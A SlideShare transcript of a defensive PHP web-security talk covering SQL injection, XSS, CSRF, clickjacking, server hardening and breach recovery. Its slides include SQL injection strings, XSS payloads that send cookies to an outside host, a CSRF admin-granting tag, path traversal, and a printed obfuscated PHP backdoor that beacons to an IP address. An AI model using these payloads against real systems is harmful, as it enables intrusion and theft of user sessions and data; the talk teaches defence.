SlideShare une entreprise Scribd logo

My app is secure... I think

Wim Godden
Wim Godden

With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.

Technologie
1  sur  86
Télécharger pour lire hors ligne
Wim Godden Cu.be Solutions My app is secure... I think
Who am I ? Wim Godden (@wimgtr) Founder of Cu.be Solutions (http://cu.be) Open Source developer since 1997 Developer of PHPCompatibility, OpenX, ... Speaker at PHP and Open Source conferences
Who are you ? Developers ? System engineers ? Network engineers ? Ever had a hack ? Through the code ? Through the server ?
This talk Based on 2-day training Lots of links at the end → slides online Code samples in PHP → no worries, works the same in other languages
My app is secure... I think Basic stuff = known... … or is it ? Code is not enough Code Webserver Database server Operating system Network
Disclaimer Do not use these techniques to hack Use the knowledge to prevent others from hacking you
Reasons for hackers to hack Steal and sell your data Use your infrastructure as a jumpstation to hack other servers Send out lots of spam Use your server in a botnet for DDOS attacks Bring down your systems …
OWASP Open Web Application Security Project www.owasp.org Top 10
SQL Injection (OWASP #1) Over 15 years Still #1 problem
Recognize this kind of code ? <? require("header.php"); $hostname="localhost"; $sqlusername="someuser"; $sqlpassword="somepass"; $dbName="somedb"; MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database."); @mysql_select_db("$dbName") or die("Unable to select database."); $fp=fopen("content/whatever.php","r"); while (!feof($fp)) $content.=fgets($fp,2); $res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']); for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++) { $lst.="<LI>".MYSQL_RESULT($res,$cnt,"text")."</LI>n"; } $content=str_replace("<@textstring@>",$lst,$content); print $content; require("footer.php"); ?>
SQL Injection (OWASP #1) Over 15 years Still #1 problem Easy to exploit Easy to automate (scan + exploit)
Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } select * from user where email='wim@cu.be' E-mail : wim@cu.be
Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } select * from user where email='' OR '1'='1' E-mail : ' OR '1'='1
Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } select * from user where '1'='1' E-mail : ' OR '1'='1
Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } select * from user E-mail : ' OR '1'='1
Hackers just want your data select * from user where email='' OR '1'='1' limit 2, 1; --'; select * from user where email='' OR '1'='1' limit 3, 1; --'; select * from user where email='' OR '1'='1' limit 4, 1; --'; ... ' OR '1'='1' limit 2, 1; –';E-mail :
SQL Injection – much more... Much more than logging in as a user SQL injection possible → wide range of dangers
Fixing SQL injection : attempt #1 Addslashes() ? $query = mysql_query('select * from user where id=' . addslashes($_GET['id'])); www.hack.me/id=5%20and%20sleep(10) select * from user where id=5 and sleep(10) What if we hit that code 100 times simultaneously ? MySQL max_connections reached → Server unavailable
Fixing SQL injection : attempt #2 mysql_real_escape_string() mysqli_real_escape_string() pg_escape_string() ...
Fixing SQL injection : use prepared statements $select = 'select * from user where email = :email'; $stmt = $db->prepare($select); $stmt->bindParam(':email', $_GET['email']); $stmt->execute(); $results = $stmt->fetchAll();
ORM tools Doctrine, Propel, … When using their query language → OK Beware : you can still execute raw SQL !
Other injections LDAP injection Command injection (system, exec, ...) Eval (waaaaaaaaaah !) … User input → Your application → External system If you provide the data, it's your responsibility ! If you consume the data, it's your responsibility !
Bobby Tables
Session fixation angel.cloud.com 1Create evil PHP code 4 Session cookie on .cloud.com + redirect 2 3 devil.cloud.com devil.cloud.com 5 Login6 Use evil session cookie <html> … <a href=”http://devil.cloud.com”>Verify your account</a> … </html>
Session hijacking www.our-app.com PHPSESSID= abcdef123PHPSESSID= abcdef123
Ways to avoid session fixation/hijacking session.use_trans_sid = 0 session.use_only_cookies = true session.cookie_httponly = true Change session on login using session_regenerate_id(true) Do not share sessions between sites/subdomains Do not accept sessions not generated by your code Foreign session → remove the session cookie from the user Regenerate session regularly using session_regenerate_id(true) Use HTTPS session.cookie_secure = true All of the above help against session fixation AND session hijacking !
XSS – Cross Site Scripting <?php addMessage($_GET['id'], $_GET['message']); echo 'Thank you for submitting your message : ' . $_GET['message']; URL : /submitMessage http://www.our-app.com/submitMessage?id=5&message=<script>alert('Fun eh ?')</script>
XSS – more advanced http://www.our-app.com/submitMessage?id=5&message=Thanks, we will be in touch soon.<script type="text/javascript" src="http://someplace.io/i-will-get-your-cookie.js"></script>
XSS – Advanced, yet simple <img src=x onerror=this.src='http://someplace.io/post-the-cookie-here.php? c='+document.cookie> http://www.our-app.com/?id=5&message=Thanks%2C+we+will+be+in+touch+soon.%3Cimg+src %3Dx+onerror%3Dthis.src%3D%27http%3A%2F%2Fsomeplace.io%2Fpost-the-cookie-here.php%3Fc%3D %27%2Bdocument.cookie%3E%0D%0A
XSS : Non-persisted vs persistent Previous examples were non-persistent : issue occurs once Post code to exploitable bulletin board → Persistent → Can infect every user → If you stored it without filtering, you're responsible for escaping on output !
XSS : how to avoid Filter input, escape output ! <?php echo 'I just submitted this message : ' . htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
CSRF : Cross Site Request Forgery www.our-app.com 1 Submit article for review 2 Retrieve article for review 3 Evil html or jsmakes call 4 Devil uses extra privileges Here's the article you were asking for. <img src=”http://www.our-app.com/userSave.php?username=Devil&admin=1” />
CSRF : ways to avoid Escape the output (where did we hear that before ?) Add a field to forms with a random hash/token for verification upon submit Check the referer header → Easy to fake <form method="post" action="userSave.php"> <input name="id" type="hidden" value="5" /> <input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" /> rest of the form </form>
General rules – input validation Assume all data you receive as input contains a hack attempt ! That includes data from trusted users → over 90% of hacks are done by employees/partners/... Filter on disallowed characters Check validity of Dates Email addresses URLs etc. Input validation is not browser-side code, it's server-side code (you can ofcourse use browser-side code to make it look good)
General rules – validation or filtering ? Validation : Verify if the values fit a defined format Examples : expecting int, but received 7.8 → “error, 7.8 is not a valid integer” expecting international phone number, but received “+32 3 844 71 89” Filtering / sanitizing : Enforce the defined format by converting to it Examples : expecting int, but received 7.8 → 8 expecting int, but received 'one' → 0 expecting international phone number, but received “+32 3 844 71 89” → “+3238447189” Both have (dis)advantages
General rules – escaping output Doing input validation → why do you need output escaping ? What if the data originates from a webservice an XML feed … Always escape output !
Clickjacking Do you want to support our cause ? NoSure Do you want to delete all your Facebook friends ? Yes No FB button <style> iframe { /* iframe from facebook.com */ width:300px; height:100px; position:absolute; top:0; left:0; filter:alpha(opacity=0); opacity:0; } </style>
Clickjacking - solutions Sending frame-ancestor directive : Content-Security-Policy: frame-ancestors 'none' Content-Security-Policy: frame-ancestors 'self' Content-Security-Policy: frame-ancestors example.com wikipedia.org Jump out of iframe (use Framekiller)
Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php redirect to main
Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php (doesn't check cookie !) redirect to main
Bad authentication / authorization layer Only hiding URLs on view, not restricting on action /somewhere is visible on screen /somewhere/admin is not visible, but is accessible Allowing direct access to other user's data /user/profile/id/311 is the user's profile /user/profile/id/312 is also accessible and updateable Allowing direct access to file downloads with guessable urls /download/file/83291.pdf Creating cookies : loggedin=1 userid=312 admin=1
Protecting your web stack Application language Webserver Database server Mail server Other servers Firewalls ...
Protecting your web stack - PHP Update to the latest version (7.1 = EOL) Safe_mode = dead → use PHP-FPM or VMs Register_globals = dead :-) Suhosin patch → mostly for web hosting companies Disable 'dangerous' PHP functions you don't need in php.ini system exec passthru 'Eval' is not a function, so can not be disabled
Protecting your web stack – PHP code If you allow uploads, restrict extensions. No .php, .phtml ! Don't show errors...
Protecting your web stack – PHP code If you allow uploads, restrict extensions. No .php, .phtml ! Don't show errors... ...and don't show exceptions, but... …log them ! And watch your logs ;-) If you use filenames as parameters download.php?filename=test.pdf Make sure you don't allow ../../../../etc/passwd Use basename() and pathinfo() to restrict File extensions : Use .php Don't use .inc, .conf, .include, ...
Protecting your web stack – Passwords Don't use MD5 or SHA1 → sha512, blowfish, … Set a good password policy Min 8 chars, min 1 number, min 1 uppercase char, … NO maximum length Try to avoid password hints → Email link is better for recovery Don't create your own password hashing algorithm ! Use password_hash() 5.5+ : built-in < 5.5 : ircmaxell/password-compat
Protecting your web stack – Webserver Block direct access to upload directories
Access to private files, uploads, ...
Protecting your web stack – Webserver Block direct access to upload directories Allow only access to port 80 and 443 (!) Disable phpMyAdmin (VPN only if required) On Apache don't : AllowOverride All Options Indexes Avoid using .htaccess Block access to .svn and .git Block access to composer.lock, composer.json, … (which should be outside your webroot normally)
Protecting your web stack – Webserver
composer.lock
composer.lock
Protecting your web stack – Database server No access from the web required Give it a private IP Other websites on network ? → send traffic over SSL
Protecting your web stack Use public/private key pairs for SSH, not passwords Don't login as root → Use sudo for commands that really need it Allow SSH access only from VPN Running Memcached ? Gearman ? … ? → Block external access
Recently...
Recently...
Recently...
Memcached DDOS attacks
Memcached DDOS attacks
Lack of updates Not updating system packages Not updating frameworks and libraries Not just main components Doctrine Bootstrap Javascript libraries etc. Not updating webserver software Not updating database server software Recently : Heartbleed (OpenSSL) Shellshock (Bash) Ghost (Glibc)
Protecting your web stack - firewalls Separate or on-server Default policy = deny all Don't forget IPv6 !!!
Protect your backups Should be encrypted with public/private key system Private key should be stored in 2 separate locations Backups should never be stored on same server Backup server should pull backups
MySQL : use the binlog Setup Master-Slave (even if you don’t have a Slave !) Master creates binlog Allows recovery to a specific second Backup the binlogs for 7-10 days MySQL backup : mysqldump with --opt --single-transaction (preferably on slave to avoid locking users)
First action of a hacker Make sure they don't lose the access they gained Create new user → easy to detect Install a custom backdoor → easy to detect with good IDS Install a backdoor based on installed software → Example : start SSHD with different config on different port (remember firewall ?) → Harder to detect → Kill it... what happens ? → Probably restarts via cronjob
Using an Intrusion Detection System Host-based Intrusion Detection System (HIDS) OSSEC Samhain Network-based Intrusion Detection System (NIDS) Snort Sirucata
One IDS distro to rule them all Security Onion Based on Ubuntu Contains all the IDS tools... ...and much more
What's the problem with public wifi ? Traffic can be intercepted Traffic hijacking / injection Forcing site to use HTTPS fixes it right ? What if user goes to some other HTTP site and I inject <img src=”http://yoursite.com/someurl”> ? → Session cookies are transmitted over HTTP Use HSTS HTTP Strict Transport Security Tells browser to use only HTTPS connections Strict-Transport-Security: max-age=expireTime [; includeSubDomains] [; preload] Chrome 4+, FF 4+, IE 11+, Opera 12+, Safari 7+
You've been hacked ! Now what ? (1/4) Take your application offline → Put up a maintenance page (on a different server) Take the server off the public Internet Change your SSH keys Make a full backup Check for cronjobs Check access/error/... logs (And give them to legal department) Were any commits made from the server ? → Your server shouldn't be able to !
What a hack might look like eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0 xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFf OF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW 5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRl cy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbC cpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRl Y29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW 9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5RTQxKSsxO31pZigkUjZCNk U5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygk UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKS sxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVF NDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRk...'));
What a hack might look like
What a hack might look like $GLOBALS['_226432454_']=Array(); function _1618533527($i) { return '91.196.216.64'; } $ip=_1618533527(0); $GLOBALS['_1203443956_'] = Array('urlencode'); function _1847265367($i) { $a=Array('http://','/btt.php? ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER'); return $a[$i]; } $url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) . $_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)]) ._1847265367(7) .$_SERVER[_1847265367(8)]; $GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt', 'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents'); function _393632915($i) { return 'curl_version'; }
You've been hacked ! Now what ? (2/4) Search system preg_replace base64_decode eval system exec passthru Search system and database script iframe
You've been hacked ! Now what ? (3/4) Find out how the hack happened ;-) Write an apology to your customers Finally : Reinstall the OS (from scratch !) Update all packages to the latest version Don't reinstall code from backup ! Install source code from versioning system Restore DB from previous backup (use binary log file)
Restoring your database to a specific point Turn on binary log Usually for master-slave replication Useful for fast recovery Make sure it can handle >24h of data Make a daily database backup Make a db dump to a file (mysqldump, …) Warning : locking danger → do this on the slave ! Backup the db dump file To recover : Restore the db dump file Replay binary log (mysqlbinlog …)
You've been hacked ! Now what ? (4/4) Install IDS Get an external security audit on the code Get an external security audit on the system/network setup Change user passwords Relaunch Cross your fingers
Takeaways Think like a hacker Can I steal data ? Can I DOS the site ? Which techniques could I use to do it ? Try it without looking at the code Try it while looking at the code Use SSL/HTTPS everywhere ! Block all traffic, then allow only what's needed Sanitize/filter your input Escape your output Use an IDS Never trust a hacked system Prepare for GDPR
Questions ?
Questions ?
The software discussed (and more) General resources OWASP : www.owasp.org SANS : http://www.sans.org/security-resources/ SecurityFocus : http://www.securityfocus.com/ CERT : http://cert.org/ SecTools : http://sectools.org/ SQL injection Havij (automated tool) – beware : might be infected !!!!!!!! https://thepirateboat.eu/torrent/8410326/Havij_v1.17ProCracked.7z Clickjacking demo : https://www.youtube.com/watch?v=3mk0RySeNsU Password use in PHP 5.5+ : password_hash function : http://php.net/password_hash < 5.5 : password_compat : https://github.com/ircmaxell/password_compat
The software discussed (and more) SSL certificates RapidSSL FreeSSL : https://www.freessl.com/ Let's Encrypt (coming soon) : https://letsencrypt.org/ StartSSL : https://www.startssl.com Block access to .svn and .git : http://blogs.reliablepenguin.com/2014/06/26/block-access-git-svn-folders Webserver flood/scan detection Nginx : http://nginx.com/resources/admin-guide/restricting-access/ Multi-webserver : http://www.fail2ban.org Proxy-based : http://www.ecl-labs.org/2011/03/17/roboo-http-mitigator.html
The software discussed (and more) Protecting your mail server SPF and DomainKeys : http://www.pardot.com/faqs/administration/adding-spf-domainkeys-dns/ DNS Hijacking : http://www.gohacking.com/dns-hijacking/ Spoofing : http://www.windowsecurity.com/articles-tutorials/authentication_and_encryption/Understanding- Man-in-the-Middle-Attacks-ARP-Part2.html IPv6 – don't forget to firewall it the same way : https://www.sixxs.net/wiki/IPv6_Firewalling Automatic scanning tools : Nessus : http://www.tenable.com/products/nessus-vulnerability-scanner Wapiti : http://wapiti.sourceforge.net/ Nexpose : http://www.rapid7.com/products/nexpose/
The software discussed (and more) Slow HTTP DOS attacks : https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate-apache-http-ser ver/ IDS PHP PHPIDS : https://github.com/PHPIDS/PHPIDS Exposé : https://github.com/enygma/expose Host-based OSSEC : www.ossec.net Samhain : http://www.la-samhna.de/samhain/ AIDE : http://aide.sourceforge.net/ Network-based Snort : https://www.snort.org/ Sirucata : http://suricata-ids.org/ All in one : Security Onion : http://blog.securityonion.net/
The software discussed (and more) Penetration testing live CD : Backtrack Linux : http://www.backtrack-linux.org/ Kali Linux : https://www.kali.org/
In case you're interested This talk : 45min Training : 2 days 1,5 days of interactive training (partly slides, partly hands-on) Try out different security issues Experiment on local virtualboxes and physical machines 0,5 day of auditing Your code Your servers Your network As a global team effort or in smaller teams More details : https://techpath.eu
Next week On stage : Derick Rethans, author of Xdebug 3 and PHP 7.4 release manager Location : Zaventem Date / time : 2019-12-11T19:00:00.00000+02:00 Find us on Meetup.com and RSVP please ;-)
Thanks ! Twitter @wimgtr Slides http://www.slideshare.net/wimg E-mail wim@cu.be

Recommandé

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Bypassing Web Application Firewalls
Bypassing Web Application FirewallsBypassing Web Application Firewalls
Bypassing Web Application FirewallsOWASP (Open Web Application Security Project)
 

Recommandé

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Bypassing Web Application Firewalls
Bypassing Web Application FirewallsBypassing Web Application Firewalls
Bypassing Web Application FirewallsOWASP (Open Web Application Security Project)
 
Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
Web security
Web securityWeb security
Web securitydavidahaskins
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
When dynamic becomes static
When dynamic becomes staticWhen dynamic becomes static
When dynamic becomes staticWim Godden
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Colin O'Dell
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeLaurence Svekis ✔
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better SecurityColin O'Dell
 
Understanding sql Injection
Understanding sql InjectionUnderstanding sql Injection
Understanding sql InjectionPotato
 
Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Craig Francis
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Rails Concurrency Gotchas
Rails Concurrency GotchasRails Concurrency Gotchas
Rails Concurrency Gotchasmarcostoledo
 
The Art Of Readable Code
The Art Of Readable CodeThe Art Of Readable Code
The Art Of Readable CodeBaidu, Inc.
 
OpenERP e l'arte della gestione aziendale con Python
OpenERP e l'arte della gestione aziendale con PythonOpenERP e l'arte della gestione aziendale con Python
OpenERP e l'arte della gestione aziendale con PythonPyCon Italia
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 

Contenu connexe

Tendances

Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
When dynamic becomes static
When dynamic becomes staticWhen dynamic becomes static
When dynamic becomes staticWim Godden
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Colin O'Dell
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeLaurence Svekis ✔
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better SecurityColin O'Dell
 
Understanding sql Injection
Understanding sql InjectionUnderstanding sql Injection
Understanding sql InjectionPotato
 
Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Craig Francis
 
Rails Concurrency Gotchas
Rails Concurrency GotchasRails Concurrency Gotchas
Rails Concurrency Gotchasmarcostoledo
 
The Art Of Readable Code
The Art Of Readable CodeThe Art Of Readable Code
The Art Of Readable CodeBaidu, Inc.
 
OpenERP e l'arte della gestione aziendale con Python
OpenERP e l'arte della gestione aziendale con PythonOpenERP e l'arte della gestione aziendale con Python
OpenERP e l'arte della gestione aziendale con PythonPyCon Italia
 

Tendances (20)

Web application Security
Web application SecurityWeb application Security
Web application Security
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
Web security
Web securityWeb security
Web security
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
 
When dynamic becomes static
When dynamic becomes staticWhen dynamic becomes static
When dynamic becomes static
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your code
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carol
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better Security
 
Understanding sql Injection
Understanding sql InjectionUnderstanding sql Injection
Understanding sql Injection
 
Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Proposed PHP function: is_literal()
Proposed PHP function: is_literal()
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Rails Concurrency Gotchas
Rails Concurrency GotchasRails Concurrency Gotchas
Rails Concurrency Gotchas
 
The Art Of Readable Code
The Art Of Readable CodeThe Art Of Readable Code
The Art Of Readable Code
 
OpenERP e l'arte della gestione aziendale con Python
OpenERP e l'arte della gestione aziendale con PythonOpenERP e l'arte della gestione aziendale con Python
OpenERP e l'arte della gestione aziendale con Python
 

Similaire à My app is secure... I think

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?ConFoo
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101brian_dailey
 
